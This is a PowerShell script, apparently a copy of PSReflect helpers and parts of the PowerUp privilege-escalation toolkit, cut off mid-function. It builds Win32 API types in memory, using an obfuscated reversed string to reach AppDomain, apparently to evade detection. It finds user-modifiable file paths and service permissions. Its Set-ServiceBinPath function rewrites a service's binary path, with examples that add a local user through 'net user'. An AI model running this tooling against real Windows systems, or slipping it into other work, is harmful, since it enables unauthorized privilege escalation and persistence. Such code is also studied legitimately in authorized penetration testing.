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Created June 4, 2024 07:19
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#Requires -Version 2
# PSReflect code for Windows API access
# Author: @mattifestation
function New-InMemoryModule
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
When defining custom enums, structs, and unmanaged functions, it is
necessary to associate to an assembly module. This helper function
creates an in-memory module that can be passed to the 'enum',
'struct', and Add-Win32Type functions.
Specifies the desired name for the in-memory assembly and module. If
ModuleName is not provided, it will default to a GUID.
$Module = New-InMemoryModule -ModuleName Win32
[Parameter(Position = 0)]
$ModuleName = [Guid]::NewGuid().ToString()
$String = 'niamoDppA.metsyS'
$classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
$AppDomain = [Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('CurrentDomain').GetValue($null, @())
$LoadedAssemblies = $AppDomain.GetAssemblies()
foreach ($Assembly in $LoadedAssemblies) {
if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
return $Assembly
$DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
$Domain = $AppDomain
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)
return $ModuleBuilder
# A helper function used to reduce typing while defining function
# prototypes for Add-Win32Type.
function func
[Parameter(Position = 0, Mandatory=$True)]
[Parameter(Position = 1, Mandatory=$True)]
[Parameter(Position = 2, Mandatory=$True)]
[Parameter(Position = 3)]
[Parameter(Position = 4)]
[Parameter(Position = 5)]
$Properties = @{
DllName = $DllName
FunctionName = $FunctionName
ReturnType = $ReturnType
if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }
if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
if ($Charset) { $Properties['Charset'] = $Charset }
if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }
New-Object PSObject -Property $Properties
function Add-Win32Type
Creates a .NET type for an unmanaged Win32 function.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: func
Add-Win32Type enables you to easily interact with unmanaged (i.e.
Win32 unmanaged) functions in PowerShell. After providing
Add-Win32Type with a function signature, a .NET type is created
using reflection (i.e. csc.exe is never called like with Add-Type).
The 'func' helper function can be used to reduce typing when defining
multiple function definitions.
The name of the DLL.
.PARAMETER FunctionName
The name of the target function.
The DLL export function name. This argument should be specified if the
specified function name is different than the name of the exported
The return type of the function.
.PARAMETER ParameterTypes
The function parameters.
.PARAMETER NativeCallingConvention
Specifies the native calling convention of the function. Defaults to
If you need to explicitly call an 'A' or 'W' Win32 function, you can
specify the character set.
Indicates whether the callee calls the SetLastError Win32 API
function before returning from the attributed method.
The in-memory module that will host the functions. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER Namespace
An optional namespace to prepend to the type. Add-Win32Type defaults
to a namespace consisting only of the name of the DLL.
$Mod = New-InMemoryModule -ModuleName Win32
$FunctionDefinitions = @(
(func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
(func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
(func ntdll RtlGetCurrentPeb ([IntPtr]) @())
$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
$Kernel32 = $Types['kernel32']
$Ntdll = $Types['ntdll']
$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
Inspired by Lee Holmes' Invoke-WindowsApi
When defining multiple function prototypes, it is ideal to provide
Add-Win32Type with an array of function signatures. That way, they
are all incorporated into the same in-memory module.
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
$NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,
$Charset = [Runtime.InteropServices.CharSet]::Auto,
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Namespace = ''
$TypeHash = @{}
if ($Module -is [Reflection.Assembly])
if ($Namespace)
$TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName")
$TypeHash[$DllName] = $Module.GetType($DllName)
# Define one type for each DLL
if (!$TypeHash.ContainsKey($DllName))
if ($Namespace)
$TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit')
$TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')
$Method = $TypeHash[$DllName].DefineMethod(
# Make each ByRef parameter an Out parameter
$i = 1
foreach($Parameter in $ParameterTypes)
if ($Parameter.IsByRef)
[void] $Method.DefineParameter($i, 'Out', $null)
$DllImport = [Runtime.InteropServices.DllImportAttribute]
$SetLastErrorField = $DllImport.GetField('SetLastError')
$CallingConventionField = $DllImport.GetField('CallingConvention')
$CharsetField = $DllImport.GetField('CharSet')
$EntryPointField = $DllImport.GetField('EntryPoint')
if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }
if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }
# Equivalent to C# version of [DllImport(DllName)]
$Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
$DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
$DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
[Reflection.FieldInfo[]] @($SetLastErrorField,
[Object[]] @($SLEValue,
([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
([Runtime.InteropServices.CharSet] $Charset),
if ($Module -is [Reflection.Assembly])
return $TypeHash
$ReturnTypes = @{}
foreach ($Key in $TypeHash.Keys)
$Type = $TypeHash[$Key].CreateType()
$ReturnTypes[$Key] = $Type
return $ReturnTypes
function psenum
Creates an in-memory enumeration for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
The 'psenum' function facilitates the creation of enums entirely in
memory using as close to a "C style" as PowerShell will allow.
The in-memory module that will host the enum. Use
New-InMemoryModule to define an in-memory module.
The fully-qualified name of the enum.
The type of each enum element.
.PARAMETER EnumElements
A hashtable of enum elements.
Specifies that the enum should be treated as a bitfield.
$Mod = New-InMemoryModule -ModuleName Win32
$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
NATIVE = 1 # Image doesn't require a subsystem.
WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem.
WINDOWS_CUI = 3 # Image runs in the Windows character subsystem.
OS2_CUI = 5 # Image runs in the OS/2 character subsystem.
POSIX_CUI = 7 # Image runs in the Posix character subsystem.
NATIVE_WINDOWS = 8 # Image is a native Win9x driver.
WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem.
EFI_ROM = 13
XBOX = 14
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Enum. :P
[Parameter(Position = 0, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
[Parameter(Position = 1, Mandatory=$True)]
[Parameter(Position = 2, Mandatory=$True)]
[Parameter(Position = 3, Mandatory=$True)]
if ($Module -is [Reflection.Assembly])
return ($Module.GetType($FullName))
$EnumType = $Type -as [Type]
$EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)
if ($Bitfield)
$FlagsConstructor = [FlagsAttribute].GetConstructor(@())
$FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
foreach ($Key in $EnumElements.Keys)
# Apply the specified enum type to each element
$null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
# A helper function used to reduce typing while defining struct
# fields.
function field
[Parameter(Position = 0, Mandatory=$True)]
[Parameter(Position = 1, Mandatory=$True)]
[Parameter(Position = 2)]
Position = $Position
Type = $Type -as [Type]
Offset = $Offset
MarshalAs = $MarshalAs
function struct
Creates an in-memory struct for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: field
The 'struct' function facilitates the creation of structs entirely in
memory using as close to a "C style" as PowerShell will allow. Struct
fields are specified using a hashtable where each field of the struct
is comprosed of the order in which it should be defined, its .NET
type, and optionally, its offset and special marshaling attributes.
One of the features of 'struct' is that after your struct is defined,
it will come with a built-in GetSize method as well as an explicit
converter so that you can easily cast an IntPtr to the struct without
relying upon calling SizeOf and/or PtrToStructure in the Marshal
The in-memory module that will host the struct. Use
New-InMemoryModule to define an in-memory module.
The fully-qualified name of the struct.
.PARAMETER StructFields
A hashtable of fields. Use the 'field' helper function to ease
defining each field.
.PARAMETER PackingSize
Specifies the memory alignment of fields.
.PARAMETER ExplicitLayout
Indicates that an explicit offset for each field will be specified.
$Mod = New-InMemoryModule -ModuleName Win32
$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
e_magic = field 0 $ImageDosSignature
e_cblp = field 1 UInt16
e_cp = field 2 UInt16
e_crlc = field 3 UInt16
e_cparhdr = field 4 UInt16
e_minalloc = field 5 UInt16
e_maxalloc = field 6 UInt16
e_ss = field 7 UInt16
e_sp = field 8 UInt16
e_csum = field 9 UInt16
e_ip = field 10 UInt16
e_cs = field 11 UInt16
e_lfarlc = field 12 UInt16
e_ovno = field 13 UInt16
e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4)
e_oemid = field 15 UInt16
e_oeminfo = field 16 UInt16
e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10)
e_lfanew = field 18 Int32
# Example of using an explicit layout in order to create a union.
$TestUnion = struct $Mod TestUnion @{
field1 = field 0 UInt32 0
field2 = field 1 IntPtr 0
} -ExplicitLayout
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Struct. :P
[Parameter(Position = 1, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
[Parameter(Position = 2, Mandatory=$True)]
[Parameter(Position = 3, Mandatory=$True)]
$PackingSize = [Reflection.Emit.PackingSize]::Unspecified,
if ($Module -is [Reflection.Assembly])
return ($Module.GetType($FullName))
[Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,
if ($ExplicitLayout)
$StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout
$StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout
$StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)
$ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
$SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
$Fields = New-Object Hashtable[]($StructFields.Count)
# Sort each field according to the orders specified
# Unfortunately, PSv2 doesn't have the luxury of the
# hashtable [Ordered] accelerator.
foreach ($Field in $StructFields.Keys)
$Index = $StructFields[$Field]['Position']
$Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
foreach ($Field in $Fields)
$FieldName = $Field['FieldName']
$FieldProp = $Field['Properties']
$Offset = $FieldProp['Offset']
$Type = $FieldProp['Type']
$MarshalAs = $FieldProp['MarshalAs']
$NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')
if ($MarshalAs)
$UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])
if ($MarshalAs[1])
$Size = $MarshalAs[1]
$AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,
$UnmanagedType, $SizeConst, @($Size))
$AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))
if ($ExplicitLayout) { $NewField.SetOffset($Offset) }
# Make the struct aware of its own size.
# No more having to call [Runtime.InteropServices.Marshal]::SizeOf!
$SizeMethod = $StructBuilder.DefineMethod('GetSize',
'Public, Static',
[Type[]] @())
$ILGenerator = $SizeMethod.GetILGenerator()
# Thanks for the help, Jason Shirk!
$ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
[Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))
# Allow for explicit casting from an IntPtr
# No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!
$ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',
'PrivateScope, Public, Static, HideBySig, SpecialName',
[Type[]] @([IntPtr]))
$ILGenerator2 = $ImplicitConverter.GetILGenerator()
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
[Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
# PowerUp Helpers
function Get-ModifiablePath {
Parses a passed string containing multiple possible file/folder paths and returns
the file paths where the current user has modification rights.
Author: @harmj0y
License: BSD 3-Clause
Takes a complex path specification of an initial file/folder path with possible
configuration files, 'tokenizes' the string in a number of possible ways, and
enumerates the ACLs for each path that currently exists on the system. Any path that
the current user has modification rights on is returned in a custom object that contains
the modifiable path, associated permission set, and the IdentityReference with the specified
rights. The SID of the current user and any group he/she are a part of are used as the
comparison set against the parsed path DACLs.
The string path to parse for modifiable files. Required
.PARAMETER LiteralPaths
Switch. Treat all paths as literal (i.e. don't do 'tokenization').
PS C:\> '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
Path Permissions IdentityReference
---- ----------- -----------------
C:\Temp\blah.exe {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
C:\Temp\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
PS C:\> Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
Path Permissions IdentityReference
---- ----------- -----------------
C:\Vuln\blah.bat {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
C:\Vuln\config.ini {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
[Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
# # false positives ?
# $Excludes = @("MsMpEng.exe", "NisSrv.exe")
# from
$AccessMask = @{
[uint32]'0x80000000' = 'GenericRead'
[uint32]'0x40000000' = 'GenericWrite'
[uint32]'0x20000000' = 'GenericExecute'
[uint32]'0x10000000' = 'GenericAll'
[uint32]'0x02000000' = 'MaximumAllowed'
[uint32]'0x01000000' = 'AccessSystemSecurity'
[uint32]'0x00100000' = 'Synchronize'
[uint32]'0x00080000' = 'WriteOwner'
[uint32]'0x00040000' = 'WriteDAC'
[uint32]'0x00020000' = 'ReadControl'
[uint32]'0x00010000' = 'Delete'
[uint32]'0x00000100' = 'WriteAttributes'
[uint32]'0x00000080' = 'ReadAttributes'
[uint32]'0x00000040' = 'DeleteChild'
[uint32]'0x00000020' = 'Execute/Traverse'
[uint32]'0x00000010' = 'WriteExtendedAttributes'
[uint32]'0x00000008' = 'ReadExtendedAttributes'
[uint32]'0x00000004' = 'AppendData/AddSubdirectory'
[uint32]'0x00000002' = 'WriteData/AddFile'
[uint32]'0x00000001' = 'ReadData/ListDirectory'
$UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value
$CurrentUserSids += $UserIdentity.User.Value
$TranslatedIdentityReferences = @{}
ForEach($TargetPath in $Path) {
$CandidatePaths = @()
# possible separator character combinations
$SeparationCharacterSets = @('"', "'", ' ', "`"'", '" ', "' ", "`"' ")
if($PSBoundParameters['LiteralPaths']) {
$TempPath = $([System.Environment]::ExpandEnvironmentVariables($TargetPath))
if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
$CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path
else {
# if the path doesn't exist, check if the parent folder allows for modification
try {
$ParentPath = Split-Path $TempPath -Parent
if($ParentPath -and (Test-Path -Path $ParentPath)) {
$CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
catch {
# because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely
else {
ForEach($SeparationCharacterSet in $SeparationCharacterSets) {
$TargetPath.Split($SeparationCharacterSet) | Where-Object {$_ -and ($_.trim() -ne '')} | ForEach-Object {
if(($SeparationCharacterSet -notmatch ' ')) {
$TempPath = $([System.Environment]::ExpandEnvironmentVariables($_)).Trim()
if($TempPath -and ($TempPath -ne '')) {
if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
# if the path exists, resolve it and add it to the candidate list
$CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path
else {
# if the path doesn't exist, check if the parent folder allows for modification
try {
$ParentPath = (Split-Path -Path $TempPath -Parent).Trim()
if($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath )) {
$CandidatePaths += Resolve-Path -Path $ParentPath | Select-Object -ExpandProperty Path
catch {
# trap because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely
else {
# if the separator contains a space
$CandidatePaths += Resolve-Path -Path $([System.Environment]::ExpandEnvironmentVariables($_)) -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path | ForEach-Object {$_.Trim()} | Where-Object {($_ -ne '') -and (Test-Path -Path $_)}
$CandidatePaths | Sort-Object -Unique | ForEach-Object {
$CandidatePath = $_
Get-Acl -Path $CandidatePath | Select-Object -ExpandProperty Access | Where-Object {($_.AccessControlType -match 'Allow')} | ForEach-Object {
$FileSystemRights = $_.FileSystemRights.value__
$Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $accessMask[$_] }
# the set of permission types that allow for modification
$Comparison = Compare-Object -ReferenceObject $Permissions -DifferenceObject @('GenericWrite', 'GenericAll', 'MaximumAllowed', 'WriteOwner', 'WriteDAC', 'WriteData/AddFile', 'AppendData/AddSubdirectory') -IncludeEqual -ExcludeDifferent
if($Comparison) {
if ($_.IdentityReference -notmatch '^S-1-5.*') {
if(-not ($TranslatedIdentityReferences[$_.IdentityReference])) {
# translate the IdentityReference if it's a username and not a SID
$IdentityUser = New-Object System.Security.Principal.NTAccount($_.IdentityReference)
$TranslatedIdentityReferences[$_.IdentityReference] = $IdentityUser.Translate([System.Security.Principal.SecurityIdentifier]) | Select-Object -ExpandProperty Value
$IdentitySID = $TranslatedIdentityReferences[$_.IdentityReference]
else {
$IdentitySID = $_.IdentityReference
if($CurrentUserSids -contains $IdentitySID) {
New-Object -TypeName PSObject -Property @{
ModifiablePath = $CandidatePath
IdentityReference = $_.IdentityReference
Permissions = $Permissions
function Get-CurrentUserTokenGroupSid {
Returns all SIDs that the current user is a part of, whether they are disabled or not.
Author: @harmj0y
License: BSD 3-Clause
First gets the current process handle using the GetCurrentProcess() Win32 API call and feeds
this to OpenProcessToken() to open up a handle to the current process token. The API call
GetTokenInformation() is then used to enumerate the TOKEN_GROUPS for the current process
token. Each group is iterated through and the SID structure is converted to a readable
string using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of
(disabled or not) is returned as a string array.
$CurrentProcess = $Kernel32::GetCurrentProcess()
$TOKEN_QUERY= 0x0008
# open up a pseudo handle to the current process- don't need to worry about closing
[IntPtr]$hProcToken = [IntPtr]::Zero
$Success = $Advapi32::OpenProcessToken($CurrentProcess, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if($Success) {
$TokenGroupsPtrSize = 0
# Initial query to determine the necessary buffer size
$Success = $Advapi32::GetTokenInformation($hProcToken, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize)
[IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize)
# query the current process token with the 'TokenGroups=2' TOKEN_INFORMATION_CLASS enum to retrieve a TOKEN_GROUPS structure
$Success = $Advapi32::GetTokenInformation($hProcToken, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if($Success) {
$TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS
For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) {
# convert each token group SID to a displayable string
$SidString = ''
$Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if($Result -eq 0) {
Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
else {
$GroupSid = New-Object PSObject
$GroupSid | Add-Member Noteproperty 'SID' $SidString
# cast the atttributes field as our SidAttributes enum
$GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes)
else {
Write-Warning ([ComponentModel.Win32Exception] $LastError)
else {
Write-Warning ([ComponentModel.Win32Exception] $LastError)
function Add-ServiceDacl {
Adds a Dacl field to a service object returned by Get-Service.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
Dacl field to each object. It does this by opening a handle with ReadControl for the
service with using the GetServiceHandle Win32 API call and then uses
QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
An array of one or more service names to add a service Dacl for. Passable on the pipeline.
PS C:\> Get-Service | Add-ServiceDacl
Add Dacls for every service the current user can read.
PS C:\> Get-Service -Name VMTools | Add-ServiceDacl
Add the Dacl to the VMTools service object.
param (
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
filter Local:Get-ServiceReadControlHandle {
param (
[Parameter(Mandatory=$True, ValueFromPipeline=$True)]
[ValidateScript({ $_ -as 'ServiceProcess.ServiceController' })]
$GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')
$ReadControl = 0x00020000
$RawHandle = $GetServiceHandle.Invoke($Service, @($ReadControl))
ForEach($ServiceName in $Name) {
$IndividualService = Get-Service -Name $ServiceName -ErrorAction Stop
try {
Write-Verbose "Add-ServiceDacl IndividualService : $($IndividualService.Name)"
$ServiceHandle = Get-ServiceReadControlHandle -Service $IndividualService
catch {
$ServiceHandle = $Null
Write-Verbose "Error opening up the service handle with read control for $($IndividualService.Name) : $_"
if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) {
$SizeNeeded = 0
$Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, @(), 0, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
# 122 == The data area passed to a system call is too small
if ((-not $Result) -and ($LastError -eq 122) -and ($SizeNeeded -gt 0)) {
$BinarySecurityDescriptor = New-Object Byte[]($SizeNeeded)
$Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, $BinarySecurityDescriptor, $BinarySecurityDescriptor.Count, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if (-not $Result) {
Write-Error ([ComponentModel.Win32Exception] $LastError)
else {
$RawSecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $BinarySecurityDescriptor, 0
$Dacl = $RawSecurityDescriptor.DiscretionaryAcl | ForEach-Object {
Add-Member -InputObject $_ -MemberType NoteProperty -Name AccessRights -Value ($_.AccessMask -as $ServiceAccessRights) -PassThru
Add-Member -InputObject $IndividualService -MemberType NoteProperty -Name Dacl -Value $Dacl -PassThru
else {
Write-Error ([ComponentModel.Win32Exception] $LastError)
$Null = $Advapi32::CloseServiceHandle($ServiceHandle)
function Set-ServiceBinPath {
Sets the binary path for a service to a specified value.
Author: @harmj0y, Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
service handle to the service with ConfigControl access using the GetServiceHandle
Win32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
to the string value specified by binPath, and the handle is closed off.
Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
Dacl field to each object. It does this by opening a handle with ReadControl for the
service with using the GetServiceHandle Win32 API call and then uses
QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
An array of one or more service names to set the binary path for. Required.
The new binary path (lpBinaryPathName) to set for the specified service. Required.
$True if configuration succeeds, $False otherwise.
PS C:\> Set-ServiceBinPath -Name VulnSvc -BinPath 'net user john Password123! /add'
Sets the binary path for 'VulnSvc' to be a command to add a user.
PS C:\> Get-Service VulnSvc | Set-ServiceBinPath -BinPath 'net user john Password123! /add'
Sets the binary path for 'VulnSvc' to be a command to add a user.
param (
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
[Parameter(Position=1, Mandatory=$True)]
filter Local:Get-ServiceConfigControlHandle {
param (
[Parameter(Mandatory=$True, ValueFromPipeline=$True)]
$GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')
$ConfigControl = 0x00000002
$RawHandle = $GetServiceHandle.Invoke($TargetService, @($ConfigControl))
ForEach($IndividualService in $Name) {
$TargetService = Get-Service -Name $IndividualService -ErrorAction Stop
try {
$ServiceHandle = Get-ServiceConfigControlHandle -TargetService $TargetService
catch {
$ServiceHandle = $Null
Write-Verbose "Error opening up the service handle with read control for $IndividualService : $_"
if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) {
$SERVICE_NO_CHANGE = [UInt32]::MaxValue
$Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, "$binPath", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($Result -ne 0) {
Write-Verbose "binPath for $IndividualService successfully set to '$binPath'"
else {
Write-Error ([ComponentModel.Win32Exception] $LastError)
$Null = $Advapi32::CloseServiceHandle($ServiceHandle)
function Test-ServiceDaclPermission {
Tests one or more passed services or service names against a given permission set,
returning the service objects where the current user have the specified permissions.
Author: @harmj0y, Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
a service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current
user are enumerated services where the user has some type of permission are filtered. The
services are then filtered against a specified set of permissions, and services where the
current user have the specified permissions are returned.
An array of one or more service names to test against the specified permission set.
.PARAMETER Permissions
A manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
.PARAMETER PermissionSet
A pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'.
PS C:\> Get-Service | Test-ServiceDaclPermission
Return all service objects where the current user can modify the service configuration.
PS C:\> Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
Return all service objects that the current user can restart.
PS C:\> Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
Return the VulnSVC object if the current user has start permissions.
param (
[Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
[ValidateSet('QueryConfig', 'ChangeConfig', 'QueryStatus', 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', 'UserDefinedControl', 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess')]
[ValidateSet('ChangeConfig', 'Restart', 'AllAccess')]
$PermissionSet = 'ChangeConfig'
$AccessMask = @{
'QueryConfig' = [uint32]'0x00000001'
'ChangeConfig' = [uint32]'0x00000002'
'QueryStatus' = [uint32]'0x00000004'
'EnumerateDependents' = [uint32]'0x00000008'
'Start' = [uint32]'0x00000010'
'Stop' = [uint32]'0x00000020'
'PauseContinue' = [uint32]'0x00000040'
'Interrogate' = [uint32]'0x00000080'
'UserDefinedControl' = [uint32]'0x00000100'
'Delete' = [uint32]'0x00010000'
'ReadControl' = [uint32]'0x00020000'
'WriteDac' = [uint32]'0x00040000'
'WriteOwner' = [uint32]'0x00080000'
'Synchronize' = [uint32]'0x00100000'
'AccessSystemSecurity' = [uint32]'0x01000000'
'GenericAll' = [uint32]'0x10000000'
'GenericExecute' = [uint32]'0x20000000'
'GenericWrite' = [uint32]'0x40000000'
'GenericRead' = [uint32]'0x80000000'
'AllAccess' = [uint32]'0x000F01FF'
$CheckAllPermissionsInSet = $False
if($PSBoundParameters['Permissions']) {
$TargetPermissions = $Permissions
else {
